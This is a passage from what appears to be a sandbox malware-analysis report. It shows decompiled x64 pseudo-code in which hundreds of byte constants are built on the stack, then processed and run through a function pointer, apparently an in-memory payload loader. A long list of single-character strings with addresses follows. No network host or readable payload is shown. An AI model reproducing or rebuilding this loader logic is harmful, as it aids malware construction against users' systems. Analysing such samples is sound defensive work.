				_v771 = 0xee;
				_v770 = 0xce;
				_v769 = 0x69;
				_v768 = 0x73;
				_v767 = 0xd4;
				_v766 = 0x28;
				_v765 = 0x6f;
				_v764 = 0x7e;
				_v763 = 0xe6;
				_v762 = 0x19;
				_v761 = 0x3c;
				_v760 = 0xa8;
				_v759 = 0x2c;
				_v758 = 7;
				_v757 = 0x70;
				_v756 = 0x1b;
				_v755 = 0x27;
				_v754 = 0x7c;
				_v753 = 0x8b;
				_v752 = 0xfa;
				_v751 = 0x3b;
				_v750 = 0x9b;
				_v749 = 0xfe;
				_v748 = 0x16;
				_v747 = 0xb2;
				_v746 = 0xae;
				_v745 = 0xe7;
				_v744 = 0x54;
				_v743 = 0x52;
				_v742 = 0x12;
				_v741 = 0xbd;
				_v740 = 0x1c;
				_v739 = 0xac;
				_v738 = 0xa;
				_v737 = 0x48;
				_v736 = 0x46;
				_v735 = 0x32;
				_v734 = 0xae;
				_v733 = 0xb;
				_v732 = 2;
				_v731 = 0x54;
				_v730 = 2;
				_v729 = 0x6b;
				_v728 = 0xa6;
				_v727 = 0x12;
				_v726 = 0xcd;
				_v725 = 0x62;
				_v724 = 0x18;
				_v723 = 5;
				_v722 = 0x3c;
				_v721 = 0xb6;
				_v720 = 0x1d;
				_v719 = 0x4f;
				_v718 = 0x4f;
				_v717 = 0;
				_v716 = 0xad;
				_v715 = 0x9b;
				_v714 = 0x7e;
				_v713 = 0x95;
				_v712 = 0xb8;
				_v711 = 0x76;
				_v710 = 0xf3;
				_v709 = 0xa9;
				_v708 = 0x21;
				_v707 = 0x7c;
				_v706 = 0x83;
				_v705 = 0xed;
				_v704 = 0x7b;
				_v703 = 0x2d;
				_v702 = 0xbf;
				_v701 = 0x60;
				_v700 = 0x4d;
				_v699 = 0x1a;
				_v698 = 0x60;
				_v697 = 0x26;
				_v696 = 0xd9;
				_v695 = 0x2b;
				_v694 = 0x6c;
				_v693 = 0x60;
				_v692 = 0xce;
				_v691 = 0xec;
				_v690 = 0x20;
				_v689 = 0x6d;
				_v688 = 0x9d;
				_v687 = 0x62;
				_v686 = 0xd4;
				_v685 = 0x22;
				_v684 = 0x50;
				_v683 = 0xc2;
				_v682 = 0x98;
				_v681 = 0x69;
				_v680 = 0xf1;
				_v679 = 0x29;
				_v678 = 0xd9;
				_v677 = 0xc3;
				_v676 = 0xda;
				_v675 = 0x12;
				_v674 = 0xb4;
				_v673 = 0x24;
				_v672 = 0x6b;
				_v671 = 0x28;
				_v670 = 0x7e;
				_v669 = 0xc2;
				_v668 = 0x11;
				_v667 = 0x30;
				_v666 = 0xdd;
				_v665 = 0x1a;
				_v664 = 0x2b;
				_v663 = 0x35;
				_v662 = 0xe4;
				_v661 = 0xd5;
				_v660 = 0x7c;
				_v659 = 0x83;
				_v658 = 0xec;
				_v657 = 0x5b;
				_v656 = 0x25;
				_v655 = 0x81;
				_v654 = 0x5f;
				_v653 = 0x4d;
				_v652 = 0x6e;
				_v651 = 0x67;
				_v650 = 8;
				_v649 = 0x16;
				_v648 = 0x5c;
				_v647 = 0x2f;
				_v646 = 0x56;
				_v645 = 0x2a;
				_v644 = 0xcd;
				_v643 = 0xdd;
				_v642 = 0x6e;
				_v641 = 0x7a;
				_v640 = 0x23;
				_v639 = 0x13;
				_v638 = 0x25;
				_v637 = 0x83;
				_v636 = 6;
				_v635 = 0xd5;
				_v634 = 0x13;
				_v633 = 0x6b;
				_v632 = 1;
				_v631 = 0x1f;
				_v630 = 0x1a;
				_v629 = 0x2a;
				_v628 = 0xde;
				_v627 = 0xb9;
				_v626 = 0x59;
				_v625 = 0x6b;
				_v624 = 0x6d;
				_v623 = 0xc;
				_v622 = 0xad;
				_v621 = 0x13;
				_v620 = 0x2b;
				_v619 = 0xe1;
				_v618 = 0xa5;
				_v617 = 0xbe;
				_v616 = 0x91;
				_v615 = 0x6f;
				_v614 = 0x29;
				_v613 = 0x35;
				_v612 = 0x40;
				_v611 = 0x25;
				_v610 = 0xc9;
				_v609 = 0x84;
				_v608 = 0x21;
				_v607 = 0x2c;
				_v606 = 0x6f;
				_v605 = 0xeb;
				_v604 = 0xae;
				_v603 = 0x1b;
				_v602 = 0x5e;
				_v601 = 0xe2;
				_v600 = 0x88;
				_v599 = 0x14;
				_v598 = 0xa8;
				_v597 = 0xf;
				_v596 = 0x64;
				_v595 = 0x2b;
				_v594 = 0x75;
				_v593 = 0x6a;
				_v592 = 0x9a;
				_v591 = 0xcd;
				_v590 = 0x47;
				_v589 = 6;
				_v588 = 0xe0;
				_v587 = 0x62;
				_v586 = 0x74;
				_v585 = 0x44;
				_v584 = 0x26;
				_v583 = 0xb9;
				_v582 = 0xe5;
				_v581 = 0x1b;
				_v580 = 0xb2;
				_v579 = 0x19;
				_v578 = 0x95;
				_v577 = 0x29;
				_v576 = 0x42;
				_v575 = 0x6f;
				_v574 = 0x95;
				_v573 = 0xd4;
				_v572 = 0x4b;
				_v571 = 0xe8;
				_v570 = 0xf6;
				_v569 = 5;
				_v568 = 0x7e;
				_v567 = 0x90;
				_v566 = 0x25;
				_v565 = 0;
				_v564 = 0x2a;
				_v563 = 0x73;
				_v562 = 0xe1;
				_v561 = 0xfc;
				_v560 = 0x1a;
				_v559 = 0xc0;
				_v558 = 0x2f;
				_v557 = 0x17;
				_v556 = 0x2a;
				_v555 = 0x5d;
				_v554 = 0x2e;
				_v553 = 0x89;
				_v552 = 0xbb;
				_v551 = 0x29;
				_v550 = 0xcb;
				_v549 = 0xac;
				_v548 = 0x2f;
				_v547 = 0xc2;
				_v546 = 0x63;
				_v545 = 0x5f;
				_v544 = 0x26;
				_v543 = 0x74;
				_v542 = 3;
				_v541 = 0x57;
				_v540 = 0x2f;
				_v539 = 0xb2;
				_v538 = 0;
				_v537 = 0xaf;
				_v536 = 0xb9;
				_v535 = 0x8d;
				_v534 = 0x5a;
				_v533 = 0x3f;
				_v532 = 0x59;
				_v531 = 0x2a;
				_v530 = 0x9a;
				_v529 = 0xb;
				_v528 = 0x32;
				_v527 = 0x55;
				_v526 = 0x3f;
				_v525 = 0x6a;
				_v524 = 0x69;
				_v523 = 0x4b;
				_v522 = 0x7c;
				_v521 = 0x2e;
				_v520 = 0x26;
				_v519 = 0x8f;
				_v518 = 0xe8;
				_v517 = 0x23;
				_v516 = 0x37;
				_v515 = 0xed;
				_v514 = 0xb9;
				_v513 = 0xf6;
				_v512 = 0x4d;
				_v511 = 0x6e;
				_v510 = 0x67;
				_v509 = 0x2f;
				_v508 = 0xd9;
				_v507 = 0x29;
				_v506 = 0xb4;
				_v505 = 0x1c;
				_v504 = 0xa8;
				_v503 = 0xc3;
				_v502 = 0xc4;
				_v501 = 0x6e;
				_v500 = 0x7a;
				_v499 = 0x23;
				_v498 = 0x1e;
				_v497 = 0xad;
				_v496 = 0x62;
				_v495 = 0xf;
				_v494 = 0x5b;
				_v493 = 0xad;
				_v492 = 0x8b;
				_v491 = 0x11;
				_v490 = 0xce;
				_v489 = 0x33;
				_v488 = 0x92;
				_v487 = 0x1d;
				_v486 = 0x39;
				_v485 = 0x1c;
				_v484 = 0x68;
				_v483 = 0x90;
				_v482 = 4;
				_v481 = 0xa5;
				_v480 = 0x93;
				_v479 = 0x17;
				_v478 = 0x2e;
				_v477 = 0x56;
				_v476 = 0xc7;
				_v475 = 0x7f;
				_v474 = 0xed;
				_v473 = 0x74;
				_v472 = 0xca;
				_v471 = 0xff;
				_v470 = 0xd5;
				_v469 = 0x3b;
				_v468 = 0xef;
				_v467 = 0x89;
				_v466 = 0xfe;
				_v465 = 0x4d;
				_v464 = 0x6e;
				_v463 = 0x67;
				_v462 = 0x2b;
				_v461 = 0x61;
				_v460 = 0xa7;
				_v459 = 0x7b;
				_v458 = 0x82;
				_v457 = 0x6d;
				_v456 = 0xcd;
				_v455 = 0xa5;
				_v454 = 0x91;
				_v453 = 0x85;
				_v452 = 0x76;
				_v451 = 0xaf;
				_v450 = 0x62;
				_v449 = 0x4d;
				_v448 = 0xe0;
				_v447 = 0x8c;
				_v446 = 0x66;
				_v445 = 0x74;
				_v444 = 0x44;
				_v443 = 0x52;
				_v442 = 0x18;
				_v441 = 0xae;
				_v440 = 0xdd;
				_v439 = 0xef;
				_v438 = 0x59;
				_v437 = 0x6b;
				_v436 = 0x6d;
				_v435 = 1;
				_v434 = 0xad;
				_v433 = 0x21;
				_v432 = 0x27;
				_v431 = 0x72;
				_v430 = 0x86;
				_v429 = 0x30;
				_v428 = 0x35;
				_v427 = 0x5c;
				_v426 = 0xe9;
				_v425 = 0x74;
				_v424 = 0x8b;
				_v423 = 0xff;
				_v422 = 0x3b;
				_v421 = 0xef;
				_v420 = 0xf7;
				_v419 = 0xa1;
				_v418 = 0x9d;
				_v417 = 0x23;
				_v416 = 0xea;
				_v415 = 0x18;
				_v414 = 0x5a;
				_v413 = 0x2e;
				_v412 = 0xc3;
				_v411 = 0x56;
				_v410 = 0x6d;
				_v409 = 0xcb;
				_v408 = 0xac;
				_v407 = 0x1b;
				_v406 = 0x93;
				_v405 = 0x6f;
				_v404 = 0xd4;
				_v403 = 0x6b;
				_v402 = 0x7c;
				_v401 = 0xa;
				_v400 = 0xdd;
				_v399 = 0xaf;
				_v398 = 0;
				_v397 = 0x6b;
				_v396 = 0xad;
				_v395 = 0xbb;
				_v394 = 0x81;
				_v393 = 0x5a;
				_v392 = 0x3f;
				_v391 = 0x59;
				_v390 = 0xee;
				_v389 = 0xad;
				_v388 = 0x39;
				_v387 = 3;
				_v386 = 0xde;
				_v385 = 0xf7;
				_v384 = 0x26;
				_v383 = 0xe6;
				_v382 = 0xfc;
				_v381 = 0x38;
				_v380 = 0xd7;
				_v379 = 0x82;
				_v378 = 0x9f;
				_v377 = 0xaa;
				_v376 = 0x80;
				_v375 = 0xd9;
				_v374 = 0xce;
				_v373 = 0x96;
				_v372 = 0xf4;
				_v371 = 5;
				_v370 = 0x99;
				_v369 = 0x86;
				_v368 = 0xe5;
				_v367 = 0xdd;
				_v366 = 0xc7;
				_v365 = 0x48;
				_v364 = 0x50;
				_v363 = 0x25;
				_v362 = 6;
				_v361 = 0xad;
				_v360 = 0x84;
				_v359 = 0x79;
				_v358 = 0x6b;
				_v357 = 0x5c;
				_v356 = 0xed;
				_v355 = 0x35;
				_v354 = 0x6c;
				_v353 = 0x8d;
				_v352 = 0x27;
				_v351 = 0x8b;
				_v350 = 0x95;
				_v349 = 0xad;
				_v348 = 0x7b;
				_v347 = 0xd;
				_v346 = 0x17;
				_v345 = 0xb4;
				_v344 = 0x9c;
				_v343 = 0x23;
				_v342 = 0xe6;
				_v341 = 0x43;
				_v340 = 0x6e;
				_v339 = 0x56;
				_v338 = 0xfc;
				_v337 = 0x2b;
				_v336 = 0xe6;
				_v335 = 0xea;
				_v334 = 0x8f;
				_v333 = 0xbf;
				_v332 = 0x61;
				_v331 = 0xbe;
				_v330 = 0xc3;
				_v329 = 0x62;
				_v328 = 0xfa;
				_v327 = 0x3a;
				_v326 = 0x24;
				_v325 = 0xb5;
				_v324 = 0x4f;
				_v323 = 0x5d;
				_v322 = 0xa7;
				_v321 = 0x26;
				_v320 = 0xd3;
				_v319 = 0xa3;
				_v318 = 0x10;
				_v317 = 0x51;
				_v316 = 0x25;
				_v315 = 0x4e;
				_v314 = 0x2d;
				_v313 = 0x31;
				_v312 = 0x3b;
				_v311 = 0x7d;
				_v310 = 0x1e;
				_v309 = 0x7b;
				_v308 = 0x35;
				_v307 = 0x1b;
				_v306 = 7;
				_v305 = 0x38;
				_v304 = 0x2f;
				_v303 = 0x19;
				_v302 = 0xe5;
				_v301 = 0xf0;
				_v300 = 0x6d;
				_v299 = 0xd1;
				_v298 = 0xfb;
				_v297 = 0x11;
				_v296 = 0xe2;
				_v295 = 0x35;
				_v294 = 0x45;
				_v293 = 0x6e;
				_v292 = 0xdc;
				_v291 = 0x57;
				_v290 = 0x7a;
				_v289 = 0x25;
				_v288 = 0xb6;
				_v287 = 0;
				_v286 = 0x77;
				_v285 = 0x61;
				_v284 = 0xbc;
				_v283 = 0x78;
				_v282 = 0xa;
				_v281 = 0x32;
				_v280 = 0x32;
				_v279 = 0x74;
				_v278 = 0xdd;
				_v277 = 0xa1;
				_v276 = 0x7e;
				_v275 = 2;
				_v274 = 0x26;
				_v273 = 0xd9;
				_v272 = 0x63;
				_v271 = 0x6d;
				_v270 = 0x30;
				_v269 = 0x25;
				_v268 = 0x4e;
				_v267 = 0x6c;
				_v266 = 0xe5;
				_v265 = 0x93;
				_v264 = 0x66;
				_v263 = 0x6c;
				_v262 = 0xd0;
				_v261 = 0x3c;
				_v260 = 0xcc;
				_v259 = 8;
				_v258 = 0x7e;
				_v257 = 0x38;
				_v256 = 0xcf;
				_v255 = 0x74;
				_v254 = 0x2c;
				_v253 = 0x68;
				_v252 = 0xd1;
				_v251 = 0x7d;
				_v250 = 0x69;
				_v249 = 0x26;
				_v248 = 0xe8;
				_v247 = 0x8d;
				_v246 = 0x29;
				_v245 = 0xd1;
				_v244 = 0x88;
				_v243 = 0x6a;
				_v242 = 0x6d;
				_v241 = 0x3f;
				_v240 = 0x31;
				_v239 = 0x60;
				_v238 = 0x39;
				_v237 = 0x77;
				_v236 = 0x58;
				_v235 = 0x63;
				_v234 = 0x10;
				_v233 = 0x24;
				_v232 = 0;
				_v231 = 0x1f;
				_v230 = 0xc6;
				_v229 = 0xb8;
				_v228 = 0x2a;
				_v227 = 0xe5;
				_v226 = 0x40;
				_v225 = 0x94;
				_v224 = 0x47;
				_v223 = 0x2f;
				_v222 = 0x21;
				_v221 = 0x6a;
				_v220 = 0x2a;
				_v219 = 0xe5;
				_v218 = 0xe6;
				_v217 = 0x23;
				_v216 = 0xd7;
				_v215 = 0x26;
				_v214 = 0x74;
				_v213 = 0x47;
				_v212 = 0x1d;
				_v211 = 0xe3;
				_v210 = 0xaf;
				_v209 = 0x30;
				_v208 = 0xf4;
				_v207 = 0x74;
				_v206 = 0xae;
				_v205 = 0x5e;
				_v204 = 0x1b;
				_v203 = 0x11;
				_v202 = 0xaa;
				_v201 = 0x85;
				_v200 = 0x5d;
				_v199 = 0x40;
				_v198 = 0x11;
				_v197 = 4;
				_v196 = 0x9a;
				_v195 = 0x1e;
				_v194 = 0x1d;
				_v193 = 0x38;
				_v192 = 0xe4;
				_v191 = 0x65;
				_v190 = 0x11;
				_v189 = 8;
				_v188 = 0x6e;
				_v187 = 0x7c;
				_v186 = 0xd3;
				_v185 = 0xf4;
				_v184 = 0x51;
				_v183 = 0xf3;
				_v182 = 0x6f;
				_v181 = 0xa6;
				_v180 = 0xa4;
				_v179 = 0x5f;
				_v178 = 0xe7;
				_v177 = 0x71;
				_v176 = 0x31;
				_v175 = 0x59;
				_v174 = 0x4d;
				_v173 = 0xef;
				_v172 = 0xac;
				_v171 = 0x9a;
				_v170 = 0x20;
				_v169 = 0x8f;
				_v168 = 0x6e;
				_v167 = 0x8b;
				_v166 = 0x86;
				_v165 = 0x11;
				_v164 = 0xe5;
				_v163 = 0x9d;
				_v162 = 0x45;
				_v161 = 0x53;
				_v160 = 0xdb;
				_v159 = 0x6e;
				_v158 = 0xd7;
				_v157 = 3;
				_v156 = 0x41;
				_v155 = 0x2f;
				_v154 = 0xe6;
				_v153 = 2;
				_v152 = 0x3e;
				_v151 = 0xde;
				_v150 = 0x78;
				_v149 = 0x4a;
				_v148 = 0x2c;
				_v147 = 0xc0;
				_v146 = 0xb9;
				_v145 = 0x26;
				_v144 = 0x2a;
				_v143 = 0xf5;
				_v142 = 0x4a;
				_v141 = 0xa7;
				_v140 = 0x47;
				_v139 = 0xec;
				_v138 = 0xd7;
				_v137 = 0x76;
				_v136 = 0xc6;
				_v135 = 0x70;
				_v134 = 0x22;
				_v133 = 0xe5;
				_v132 = 0x8c;
				_v131 = 0x2e;
				_v130 = 0x4b;
				_v129 = 0x88;
				_v128 = 0x6d;
				_v127 = 0xc3;
				_v126 = 0x1a;
				_v125 = 0x92;
				_v124 = 0x75;
				_v123 = 0x9d;
				_v122 = 0x54;
				_v121 = 0x6e;
				_v120 = 0x8b;
				_v119 = 0x84;
				_v118 = 0x19;
				_v117 = 0xa7;
				_v116 = 0xbf;
				_v115 = 0x49;
				_v114 = 0x62;
				_v113 = 0x3f;
				_v112 = 0xfc;
				_v111 = 0xde;
				_v110 = 0xf6;
				_v109 = 0x2c;
				_v108 = 0x84;
				_v107 = 0x2c;
				_v106 = 0xc0;
				_v105 = 0x22;
				_v104 = 0x46;
				_v103 = 4;
				_v102 = 0xaf;
				_v101 = 0x19;
				_v100 = 0x31;
				_v99 = 0x31;
				_v98 = 0x90;
				_v97 = 0xe0;
				_v96 = 0x74;
				_v95 = 0x83;
				_v94 = 0xd3;
				_v93 = 0x72;
				_v92 = 0x13;
				_v91 = 0xee;
				_v90 = 0xb7;
				_v89 = 0x15;
				_v88 = 0x91;
				_v87 = 0x98;
				_v86 = 0x91;
				_v85 = 0xd9;
				_v84 = 0x20;
				_v83 = 0x6c;
				_v82 = 0x13;
				_v81 = 0xa8;
				_v80 = 0x42;
				_v79 = 0x65;
				_v78 = 0x27;
				_v77 = 0x79;
				_v76 = 0xe3;
				_v75 = 0x50;
				_v74 = 0x91;
				_v73 = 0x60;
				_v72 = 0x46;
				_v71 = 0xd3;
				_v70 = 0x29;
				_v69 = 0x68;
				_v68 = 0xd;
				_v67 = 0x25;
				_v66 = 0xf4;
				_v65 = 0xae;
				_v64 = 0x5e;
				_v63 = 0xae;
				_v62 = 0x10;
				_v61 = 0x68;
				_v60 = 0xad;
				_v59 = 0xa6;
				_v58 = 0x24;
				_v57 = 0x66;
				_v56 = 0xff;
				_v55 = 0x22;
				_v54 = 0xe6;
				_v53 = 0x63;
				_v52 = 0x54;
				_v51 = 0x4f;
				_v50 = 0x61;
				_v49 = 0xbe;
				_v48 = 0x6c;
				_v47 = 0xe;
				_v46 = 0x5b;
				_v45 = 0x2c;
				_v44 = 0xb7;
				_v43 = 0x2a;
				_v42 = 0x69;
				_v41 = 0x5e;
				_v40 = 0x2f;
				_v39 = 0xe5;
				_v38 = 0x2e;
				_v37 = 0x43;
				_v36 = 0x70;
				_v35 = 0x18;
				_v34 = 0xa6;
				_v33 = 0x8a;
				_v32 = 0x7c;
				_v31 = 0x2f;
				_v30 = 0x24;
				_v29 = 0xe0;
				_v2796 = 0xa2c;
				_v2776 = 0;
				E00007FFA7FFA09509970(0x5f5e100, _v2792,  &_v2672); // executed
				E00007FFA7FFA094F1490(_t2715, _t2715);
				_v2760 = _t2715;
				E00007FFA7FFA09509970(0x5f5e100, _v2792,  &_v2704); // executed
				E00007FFA7FFA094F14B0(_t2715);
				r9d = 0x5f5e100;
				if ((E00007FFA7FFA09509410(_t2703, __esp,  &_v2776,  &_v2800, _t2715) & 0x000000ff) != 0) goto 0x950924a;
				_v2804 = 1;
				goto 0x9509252;
				_v2804 = 0;
				_v2808 = _v2804 & 0x000000ff;
				E00007FFA7FFA094F1540( &_v2704);
				E00007FFA7FFA094F1540( &_v2672);
				_t2669 = _v2808 & 0x000000ff;
				if (_t2669 == 0) goto 0x9509382;
				E00007FFA7FFA09509F00();
				__imp__CoInitialize();
				_v2780 = _t2669;
				if (_v2780 >= 0) goto 0x95092bb;
				r9d = 0;
				r8d = 0;
				MessageBoxA(??, ??, ??, ??);
				goto 0x95093ea;
				r9d = 0x64;
				LoadStringW(??, ??, ??, ??);
				r9d = 0x64;
				LoadStringW(??, ??, ??, ??);
				E00007FFA7FFA09503ED0(_a8);
				if (E00007FFA7FFA09503CB0(_a16, _a8) != 0) goto 0x950932d;
				__imp__CoUninitialize();
				goto 0x95093ea;
				r9d = 0;
				r8d = 0;
				if (GetMessageW(??, ??, ??, ??) == 0) goto 0x9509372;
				if (TranslateAcceleratorW(??, ??, ??) != 0) goto 0x9509370;
				TranslateMessage(??);
				DispatchMessageW(??);
				goto 0x950932d;
				__imp__CoUninitialize();
				goto 0x95093ea;
				r8d = 0x20;
				E00007FFA7FFA094F6920(0, 0, _t2703, __esp, 0x956fdc0, 0x956a060, _t2746,  &_v2752);
				_t2716 = _a8;
				 *0x956fdc0 = _t2716;
				 *0x956fdc8 = 1;
				E00007FFA7FFA09509510(_v2800, _v2776, 0x956a060); // executed
				 *0x956fdd0 = _t2716;
				E00007FFA7FFA09509510(_v2796,  &_v2632, 0x956a060); // executed
				_v2768 = _t2716;
				_v2768();
				return E00007FFA7FFA094F3A70(1, 0, _v2796, _v24 ^ _t2748);
			}

Strings

/, xrefs: 00007FFA09505A67
d, xrefs: 00007FFA095079FF
~, xrefs: 00007FFA09504E57
:, xrefs: 00007FFA09508887
5, xrefs: 00007FFA09507F97
$, xrefs: 00007FFA09505297
U, xrefs: 00007FFA09505587
<, xrefs: 00007FFA09506A7F
8, xrefs: 00007FFA09505AB7
|, xrefs: 00007FFA09508CE7
g, xrefs: 00007FFA0950504F
6, xrefs: 00007FFA09505EB7
$, xrefs: 00007FFA09505D77
3, xrefs: 00007FFA09507577
!, xrefs: 00007FFA095079AF
<, xrefs: 00007FFA09507AF7
t, xrefs: 00007FFA09507607
, xrefs: 00007FFA095072C7
8, xrefs: 00007FFA095052E7
@, xrefs: 00007FFA095074BF
n, xrefs: 00007FFA09504A2F
(, xrefs: 00007FFA09506047
P, xrefs: 00007FFA0950556F
?, xrefs: 00007FFA0950577F
>, xrefs: 00007FFA0950768F
r, xrefs: 00007FFA09504F7F
b, xrefs: 00007FFA09508877
1, xrefs: 00007FFA09507317
{, xrefs: 00007FFA09507CBF
$, xrefs: 00007FFA09504B1F
&, xrefs: 00007FFA095072EF
z, xrefs: 00007FFA095047A7
G, xrefs: 00007FFA09508C17
g, xrefs: 00007FFA0950517F
n, xrefs: 00007FFA09506E37
3, xrefs: 00007FFA09505F8F
_, xrefs: 00007FFA095068BF
3, xrefs: 00007FFA09505F0F
9, xrefs: 00007FFA09506977
w, xrefs: 00007FFA0950691F
i, xrefs: 00007FFA0950759F
&, xrefs: 00007FFA095086BF
., xrefs: 00007FFA095085D7
t, xrefs: 00007FFA09508A07
?, xrefs: 00007FFA0950867F
D, xrefs: 00007FFA09505F9F
m, xrefs: 00007FFA09505C2F
t, xrefs: 00007FFA0950740F
g, xrefs: 00007FFA09504E47
i, xrefs: 00007FFA09508AEF
M, xrefs: 00007FFA09508437
`, xrefs: 00007FFA09507CD7
., xrefs: 00007FFA095083CF
Y, xrefs: 00007FFA09507F2F
^, xrefs: 00007FFA095053B7
J, xrefs: 00007FFA09504867
, xrefs: 00007FFA09508D6F
?, xrefs: 00007FFA09505FDF
(, xrefs: 00007FFA0950798F
(, xrefs: 00007FFA09505E5F
n, xrefs: 00007FFA0950843F
\, xrefs: 00007FFA09504E2F
d, xrefs: 00007FFA09507027
*, xrefs: 00007FFA09508E3F
v, xrefs: 00007FFA09505267
l, xrefs: 00007FFA095046B7
&, xrefs: 00007FFA09508C07
^, xrefs: 00007FFA095090BF
/, xrefs: 00007FFA0950819F
J, xrefs: 00007FFA09505417
*, xrefs: 00007FFA0950815F
u, xrefs: 00007FFA0950802F
Z, xrefs: 00007FFA09506897
e, xrefs: 00007FFA0950566F
&, xrefs: 00007FFA095057A7
Z, xrefs: 00007FFA095042EF
c, xrefs: 00007FFA0950784F
O, xrefs: 00007FFA09505B67
M, xrefs: 00007FFA095055D7
&, xrefs: 00007FFA0950660F
,, xrefs: 00007FFA09504AEF
c, xrefs: 00007FFA095081AF
n, xrefs: 00007FFA0950587F
l, xrefs: 00007FFA0950651F
5, xrefs: 00007FFA09508987
a, xrefs: 00007FFA09506567
i, xrefs: 00007FFA0950916F
v, xrefs: 00007FFA0950667F
[, xrefs: 00007FFA0950914F
I, xrefs: 00007FFA095045F7
/, xrefs: 00007FFA095053AF
_, xrefs: 00007FFA09506A5F
W, xrefs: 00007FFA09504747
c, xrefs: 00007FFA09506077
X, xrefs: 00007FFA09506927
g, xrefs: 00007FFA095043A7
n, xrefs: 00007FFA09505C97
=, xrefs: 00007FFA095057E7
t, xrefs: 00007FFA095084D7
5, xrefs: 00007FFA09504CA7
n, xrefs: 00007FFA095078CF
), xrefs: 00007FFA09507837
b, xrefs: 00007FFA09504D17
T, xrefs: 00007FFA09507B7F
5, xrefs: 00007FFA095087A7
[, xrefs: 00007FFA0950736F
&, xrefs: 00007FFA09508AF7
T, xrefs: 00007FFA09505DDF
=, xrefs: 00007FFA095062CF
, xrefs: 00007FFA0950901F
(, xrefs: 00007FFA095049C7
@, xrefs: 00007FFA095043D7
E, xrefs: 00007FFA09506007
t, xrefs: 00007FFA095066C7
N, xrefs: 00007FFA0950528F
., xrefs: 00007FFA09505E9F
0, xrefs: 00007FFA09508A4F
q, xrefs: 00007FFA095070E7
], xrefs: 00007FFA095088A7
@, xrefs: 00007FFA09507F9F
~, xrefs: 00007FFA095061FF
", xrefs: 00007FFA09508F77
;, xrefs: 00007FFA09505F37
e, xrefs: 00007FFA09506B7F
d, xrefs: 00007FFA09505177
/, xrefs: 00007FFA0950893F
", xrefs: 00007FFA095074A7
!, xrefs: 00007FFA09508BCF
S, xrefs: 00007FFA095057BF
&, xrefs: 00007FFA09506877
*, xrefs: 00007FFA095055CF
y, xrefs: 00007FFA09508787
A, xrefs: 00007FFA09504457
G, xrefs: 00007FFA0950804F
", xrefs: 00007FFA09504FAF
U, xrefs: 00007FFA095059F7
%, xrefs: 00007FFA09506EF7
n, xrefs: 00007FFA09505977
J, xrefs: 00007FFA09504A7F
1, xrefs: 00007FFA095073B7
&, xrefs: 00007FFA0950549F
+, xrefs: 00007FFA09504C7F
C, xrefs: 00007FFA09509197
t, xrefs: 00007FFA09504417
+, xrefs: 00007FFA09504D97
o, xrefs: 00007FFA0950692F
P, xrefs: 00007FFA09506717
', xrefs: 00007FFA095070A7
1, xrefs: 00007FFA09506177
', xrefs: 00007FFA095048A7
s, xrefs: 00007FFA0950594F
/, xrefs: 00007FFA09508BC7
H, xrefs: 00007FFA09504F87
r, xrefs: 00007FFA095053DF
<, xrefs: 00007FFA09505A1F
:, xrefs: 00007FFA0950428F
x, xrefs: 00007FFA095063D7
z, xrefs: 00007FFA09504C5F
y, xrefs: 00007FFA09506B07
(, xrefs: 00007FFA09507127
), xrefs: 00007FFA09505F1F
{, xrefs: 00007FFA0950462F
}, xrefs: 00007FFA09504CAF
S, xrefs: 00007FFA0950463F
M, xrefs: 00007FFA095059E7
n, xrefs: 00007FFA09508DC7
5, xrefs: 00007FFA09506AEF
", xrefs: 00007FFA09504A07
N, xrefs: 00007FFA0950642F
&, xrefs: 00007FFA095053E7
$, xrefs: 00007FFA0950538F
l, xrefs: 00007FFA09506437
/, xrefs: 00007FFA09505B3F
\, xrefs: 00007FFA09504647
;, xrefs: 00007FFA09504F0F
d, xrefs: 00007FFA09505C77
Z, xrefs: 00007FFA09506B87
5, xrefs: 00007FFA09505F57
d, xrefs: 00007FFA095065B7
n, xrefs: 00007FFA09504B47
V, xrefs: 00007FFA095085E7
Q, xrefs: 00007FFA09504A37
b, xrefs: 00007FFA095077E7
3, xrefs: 00007FFA09508377
*, xrefs: 00007FFA095078B7
M, xrefs: 00007FFA09505277
p, xrefs: 00007FFA0950919F
S, xrefs: 00007FFA09507237
s, xrefs: 00007FFA09505077
~, xrefs: 00007FFA09506FFF
j, xrefs: 00007FFA09508B27
!, xrefs: 00007FFA0950535F
5, xrefs: 00007FFA0950855F
D, xrefs: 00007FFA095084DF
M, xrefs: 00007FFA09505D1F
h, xrefs: 00007FFA095073A7
1, xrefs: 00007FFA095088F7
", xrefs: 00007FFA0950608F
P, xrefs: 00007FFA09506197
8, xrefs: 00007FFA09505DA7
\, xrefs: 00007FFA09506BCF
#, xrefs: 00007FFA09507EBF
U, xrefs: 00007FFA09504FEF
?, xrefs: 00007FFA09506EFF
s, xrefs: 00007FFA0950687F
\, xrefs: 00007FFA09507E7F
m, xrefs: 00007FFA09505907
d, xrefs: 00007FFA095074B7
f, xrefs: 00007FFA09505E7F
a, xrefs: 00007FFA095056BF
a, xrefs: 00007FFA095054FF
/, xrefs: 00007FFA09506FBF
/, xrefs: 00007FFA095072A7
u, xrefs: 00007FFA095068AF
), xrefs: 00007FFA0950795F
g, xrefs: 00007FFA0950753F
o, xrefs: 00007FFA09504AC7
M, xrefs: 00007FFA09506E2F
l, xrefs: 00007FFA0950716F
?, xrefs: 00007FFA09506377
M, xrefs: 00007FFA0950586F
%, xrefs: 00007FFA09504597
|, xrefs: 00007FFA09507CA7
$, xrefs: 00007FFA095091CF
g, xrefs: 00007FFA09508447
m, xrefs: 00007FFA095064CF
k, xrefs: 00007FFA09507F37
4, xrefs: 00007FFA09506D5F
., xrefs: 00007FFA09504E77
M, xrefs: 00007FFA09504617
*, xrefs: 00007FFA09508B9F
), xrefs: 00007FFA095047B7
*, xrefs: 00007FFA09507F17
q, xrefs: 00007FFA09508D37
<, xrefs: 00007FFA0950460F
e, xrefs: 00007FFA095044DF
@, xrefs: 00007FFA0950671F
l, xrefs: 00007FFA09507D0F
&, xrefs: 00007FFA09504197
', xrefs: 00007FFA095087BF
2, xrefs: 00007FFA09505517
`, xrefs: 00007FFA09507CEF
8, xrefs: 00007FFA095060A7
., xrefs: 00007FFA09505CB7
V, xrefs: 00007FFA095076A7
^, xrefs: 00007FFA09504FB7
!, xrefs: 00007FFA09507FBF
u, xrefs: 00007FFA095045FF
D, xrefs: 00007FFA09505757
;, xrefs: 00007FFA09508417
7, xrefs: 00007FFA09505B27
V, xrefs: 00007FFA09506137
%, xrefs: 00007FFA09506427
G, xrefs: 00007FFA09507787
i, xrefs: 00007FFA09504E9F
Z, xrefs: 00007FFA09506C07
,, xrefs: 00007FFA09509157
z, xrefs: 00007FFA095046FF
M, xrefs: 00007FFA09507E57
